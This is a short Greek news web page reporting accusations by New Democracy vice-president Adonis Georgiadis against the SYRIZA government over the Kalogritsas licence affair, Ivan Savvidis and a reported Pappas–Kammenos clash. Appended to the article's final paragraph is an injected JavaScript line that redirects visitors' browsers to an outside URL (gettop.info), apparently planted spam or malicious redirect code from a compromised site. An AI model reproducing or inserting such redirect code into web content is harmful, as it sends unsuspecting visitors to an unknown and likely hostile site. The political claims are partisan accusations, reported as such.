Νέες καταγγελίες από Άδωνι: Ο Ιβάν Σαββίδης το σχέδιο Β του ΣΥΡΙΖΑ

0
16

 

Εσωκομματική κόντρα μεταξύ Νίκου Παππά και Πάνου Καμμένου βλέπει ο αντιπρόεδρος της ΝΔ Άδωνις Γεωργιάδης, τονίζοντας πως «ο χειρισμός της υπόθεσης Καλογρίτσα είναι ο ορισμός της διαπλοκής» προβαίνοντας σε νέες σοβαρές καταγγελίες κατά της κυβέρνησης.

Ο κ. Γεωργιάδης αναφέρθηκε στο Υπερταμείο λέγοντας πως «η Βουλή μας δεν θα ξαναερωτηθεί ποτέ για τις ιδιωτικοποιήσεις», ενώ μιλώντας στον Alpha Radio επιτέθηκε στην ΚΟ του ΣΥΡΙΖΑ λέγοντας τους να «αφήσουν τις κλάψες και ας μάθουν οι βουλευτάκοι τι ψηφίζουν».

Σχετικά με την υπόθεση Καλογρίτσα είπε πως πιστεύει ότι ο Ιβάν Σαββίδης «είναι το σχέδιο Β του ΣΥΡΙΖΑ», αλλά και πως «έγινε ενδοκυβερνητική σύγκρουση με Παππά και Καμμένο». Παράλληλα τόνισε πως «μένει να το δούμε» εάν θα πάρει άδεια ο κ. Σαββίδης.

Επίσης, χαρακτήρισε τον χειρισμό της υπόθεσης Καλογρίτσα «ορισμό της διαπλοκής» και υποστήριξε πως «εάν δεν είχε παρέμβει ο Στουρνάρας, ο κ. Καλογρίτσας θα είχε πληρώσει», κατηγορώντας τον Νίκο Παππά πως «κλείνει το Mega εκφοβίζοντας τις τράπεζες να εφαρμόσουν τραπεζικά κριτήρια». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here